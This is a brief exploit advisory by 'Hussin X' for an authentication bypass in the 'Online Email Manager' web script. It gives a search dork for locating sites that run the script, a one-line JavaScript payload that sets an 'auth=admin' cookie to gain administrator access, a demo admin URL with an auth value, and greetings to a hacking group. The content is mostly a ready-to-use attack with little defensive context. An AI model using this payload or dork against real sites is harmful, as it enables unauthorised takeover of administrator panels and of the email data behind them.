Online Email Manager Insecure Cookie Handling Vulnerability
{____________________________________}
Author: Hussin X
Home : WwW.IQ-TY.CoM
email: darkangel_g85[at]Yahoo[DoT]com
{____________________________________}
script : http://www.esoftpro.com/web_scripts_online_email_manager.php
DorK : Powered by Online Email Manager
exploit:
javascript:document.cookie = "auth=admin; path=/";
Demo :
http://www.esoftpro.com/demo/OEM/admin/index.php
auth = esoftcom_demo
Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke
| Cyber-Zone | kadmiwe | ahmed hassan | Sakab }
end.